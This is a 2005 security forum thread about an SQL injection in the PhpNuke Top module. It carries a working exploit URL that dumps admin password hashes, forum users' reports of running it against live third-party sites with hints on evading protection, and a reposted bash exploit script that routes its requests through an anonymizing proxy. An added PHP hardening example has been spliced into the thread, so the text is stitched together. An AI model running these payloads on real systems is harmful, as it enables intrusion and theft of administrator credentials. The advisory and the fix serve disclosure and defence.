Waraxe IT Security Portal
SA#41 - Critical Sql Injection in PhpNuke 6.x-7.6 Top module
Posted: Wed Apr 06, 2005 6:43 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

{================================================================================}
{ [waraxe-2005-SA#041] }
{================================================================================}
{ }
{ [ Critical Sql Injection in PhpNuke 6.x-7.6 Top module ] }
{ }
{================================================================================}

Author: Janek Vind "waraxe"
Date: 06. April 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-41.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular opensource content management system, written in php by
Francisco Burzi. This CMS is used on many thousands of websites, because it's
freeware, easy to install and manage, and has a broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Like the title says, this time the sql injection security hole has been found in
the phpnuke "Top" module. Let's look at the source code of the phpnuke 7.6 Top module
index file (/modules/Top/index.php) ~ line 186:

[original source code]

/* Top 10 Polls */

$result8 = $db->sql_query("select * from ".$prefix."_poll_desc $queryplang");

if ($db->sql_numrows($result8)>0) {
    echo "<table border=\"0\" cellpadding=\"10\" width=\"100%\"><tr><td align=\"left\">\n"
        ."<font class=\"option\"><b>$top "._VOTEDPOLLS."</b></font><br><br><font class=\"content\">\n";
    $lugar = 1;

    // $querylang is never initialized in this file before it is spliced into the query
    $result9 = sql_query("SELECT pollID, pollTitle, timeStamp, voters FROM ".$prefix."_poll_desc
        $querylang order by voters DESC limit 0,$top", $dbi);

    $counter = 0;

[/original source code]

And what's the problem? It appears that the variable "$querylang" is uninitialized. So, if we
"poison" the php variable space through GET/POST/COOKIE, then sql query manipulation is
possible.

[real life exploit]

http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*

[/real life exploit]


... and as a result we can see the md5 hashes of all the admin passwords in the place where normally
the top 10 votes can be seen :)
Of course, mysql version 4.x must be used, with union functionality enabled. And if there are
Sentinel or similar protection systems installed, additional measures must be used to evade them.

Have a nice day!


How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

For help, look at http://www.waraxe.us/forums.html


Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free Base64 decoder and encoder - http://base64-encoder-online.waraxe.us/

SiteMapper - free php script for phpNuke powered websites -
the newest version 0.4 can be downloaded at http://sitemapper.waraxe.us/


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, murdock, g0df4th3r, slimjim100, shai-tan, y3dips and
all other active members of my forum!

Special greets to Heintz - congrats on the phpbb sploit finding!

Tervitused (greetings) - Raido Kerna!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------


Last edited by waraxe on Thu Jun 22, 2006 1:11 pm; edited 1 time in total
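The advisory's "How to fix" section only points to the forum, so here is an added example (my own code, not PhpNuke's and not part of the original post) of how the poll query from the excerpt above can be built without ever reading $querylang from the request. It assumes PhpNuke-style configuration variables named $prefix, $multilingual, $currentlang and $top (the names are assumptions, set to constructed values below); the language filter is derived from a whitelisted language code, the table prefix and limit are validated, and any request-supplied querylang is simply ignored.

```php
<?php
// Added example (not PhpNuke's own code): hardened construction of the
// Top module's "most voted polls" query discussed in the advisory.
// Assumed names: $prefix, $multilingual, $currentlang and $top stand in
// for PhpNuke configuration values and are never taken from the request.

declare(strict_types=1);

/**
 * Build the language filter ourselves instead of trusting a $querylang
 * that register_globals may have imported from GET/POST/COOKIE.
 * Only a short lowercase language code is accepted; anything else
 * falls back to "no filter" rather than reaching the SQL text.
 */
function poll_lang_filter(bool $multilingual, string $currentlang): string
{
    if (!$multilingual) {
        return '';
    }
    if (preg_match('/^[a-z]{2,10}$/', $currentlang) !== 1) {
        return '';
    }
    return "WHERE (plang='" . $currentlang . "' OR plang='')";
}

/**
 * Build the "top N most voted polls" query. The table prefix is restricted
 * to identifier characters and the limit is forced to a positive integer,
 * so no unvalidated string is ever concatenated into the statement.
 */
function top_polls_query(string $prefix, bool $multilingual, string $currentlang, $top): string
{
    if (preg_match('/^[A-Za-z0-9_]+$/', $prefix) !== 1) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $limit  = max(1, (int) $top);
    $filter = poll_lang_filter($multilingual, $currentlang);

    $sql = "SELECT pollID, pollTitle, timeStamp, voters FROM {$prefix}_poll_desc";
    if ($filter !== '') {
        $sql .= ' ' . $filter;
    }
    return $sql . " ORDER BY voters DESC LIMIT 0,{$limit}";
}

// Demonstration with constructed values. A request carrying ?querylang=...
// (the advisory's vector) has no effect, because that variable is never read.
$_GET['querylang'] = 'tampered-value-from-request';

$prefix      = 'nuke';      // constructed
$multilingual = true;       // constructed
$currentlang = 'english';   // constructed
$top         = '10';        // constructed (PhpNuke stores it as a string)

echo top_polls_query($prefix, $multilingual, $currentlang, $top), PHP_EOL;

// A language value that is not a plain language code is dropped, not spliced in.
echo top_polls_query($prefix, true, "x' OR 1=1", $top), PHP_EOL;
```

Run it with `php top_polls_fixed.php`. On the PHP 4 era installs the advisory targets, the root cause is register_globals importing GET/POST/COOKIE values into the variable space; disabling it (register_globals = Off) or initializing $querylang before use removes the vector, and the whitelist above keeps the query safe even if it stays on.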
Posted: Wed Apr 06, 2005 7:10 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Wooow Waraxe!!!!!! Nice one! :D

I'll try it now immediately!

Salut!
Posted: Wed Apr 06, 2005 9:57 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

By the way, I found this sql injection bug a long time ago, somewhere around November 2004, and had not published it yet. More than 3 months have passed but nobody has found that little security bug :lol:
Even worse, this bug exists even in very old nuke versions, maybe 5.x too, I have not tested... ;)
Posted: Wed Apr 06, 2005 10:12 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Hehehe, as we say in Spain: "Lo bueno se hace esperar" ;)
(In English it means: "Good things make you wait", or something like this :P)
Posted: Thu Apr 07, 2005 7:31 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

there you go waraxe, a step ahead to get back on track

maybe you could put it into your SQLaxe library :lol:

_________________
IO::y3dips->new(http://clog.ammar.web.id);
Posted: Thu Apr 07, 2005 10:22 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

good work waraxe :)
Posted: Thu Apr 07, 2005 10:33 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Thanks, mate :D

By the way - a new advisory will come out sometime next week and it will not be about phpnuke, but some other widely-used software ;)

So, stay tuned and check bugtraq and my forum 8)
Posted: Fri Apr 08, 2005 9:43 am
SteX
Advanced user
Joined: May 18, 2004
Posts: 181
Location: Serbia

keep working..

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
Posted: Fri Apr 08, 2005 12:12 pm
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial up is good for some things. Especially when my IP changes every time I log on. Lets me not get affected by Sentinel. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skinhead. :lol:

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Posted: Fri Apr 08, 2005 12:28 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Wow! My name is also mentioned! :_ )
Thanks waraxe!
Posted: Fri Apr 08, 2005 12:34 pm
shai-tan
Valuable expert
Joined: Feb 22, 2005
Posts: 477

Damn you :lol:

You got your name mentioned first 8)

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Posted: Fri Apr 08, 2005 2:15 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

shai-tan wrote:
Thanks for mentioning my name lol.
A lot of sites have already had this problem fixed well before it went public.

Dial up is good for some things. Especially when my IP changes every time I log on. Lets me not get affected by Sentinel. lol

Thanks for the name mention. That makes me proud.

BTW I just got all my hair shaved off. So I look like a skinhead. :lol:


There are many restricting factors for that exploit to be successful:

1. UNION functionality means that the mysql engine must be > 4.x
2. the Top module must be activated
3. if there are not enough voted polls, the sploit will not work

etc ...

But real-life tests will show that there are lots of phpnuke driven websites waiting for a patch :)
Posted: Fri Apr 08, 2005 2:46 pm
murdock
Advanced user
Joined: Mar 16, 2005
Posts: 54

Here are the typical errors I get using this exploit:

Sometimes it returns:

Code:
10 primeras encuestas más votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores más activos


Sometimes simply nothing appears:

Code:
10 primeras encuestas más votadas


10 autores más activos


And sometimes it simply...works! ;) http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg
Posted: Fri Apr 08, 2005 2:51 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Yes, that's it:

Case 1 - mysql 3.x without UNION functionality:

Code:
10 primeras encuestas más votadas

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/.sites/117/site48/web/html/includes/sql_layer.php on line 414

10 autores más activos


Case 2 - not enough votes or votes disabled:

Code:
10 primeras encuestas más votadas


10 autores más activos


And if you are lucky enough:

Quote:
http://img8.exs.cx/my.php?loc=img8&image=sqlinjecttop2pl.jpg


:D
Posted: Fri Apr 08, 2005 8:08 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Look here for the sploit derivation:

http://www.milw0rm.com/id.php?id=921

Code:

#!/bin/bash

# This is just basic-ly modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1
# works thou /str0ke

#
# PHPNuke Top Module Remote SQL Injection
# by Fabrizi Andrea 2005
# andrea.fabrizi [at] gmail.com
#
# Work with the PHPNuke latest version!
#

URL=$1;
# Renamed from PATH: assigning PATH would clobber the shell's command search path.
NUKEPATH="$2/";
ANON="http://anonymouse.ws/cgi-bin/anon-www.cgi/";

echo -e "\n PHPNuke Top Module Remote SQL Injection"
echo -e " by Fabrizi Andrea 2005"

if [ "$URL" = "" ]; then
  echo -e "\n USAGE: $0 [URL] [NukePath]"
  echo -e " Example: $0 www.site.net phpNuke\n"
  exit
fi;

if [ "$NUKEPATH" = "/" ]; then NUKEPATH=""; fi;
#anon_query_url="$ANON""http://$URL/$NUKEPATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
anon_query_url="$ANON""http://$URL/$NUKEPATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

#query_url="http://$URL/$NUKEPATH""modules.php?name=Top&querylang=union/**/%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1";
query_url="http://$URL/$NUKEPATH""modules.php?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1"; #changed line /str0ke

echo -e "\n - Anonymous Query URL: "$anon_query_url "\n";
echo -e " - Direct Query URL: " $query_url "\n";
echo -e " - If this version of PHPNuke is vulnerable you can see the Admin's Passwords Hashes at the end of 'Most voted polls' List!\n"
# milw0rm.com [2005-04-07]


Nice one :D
Page 1 of 2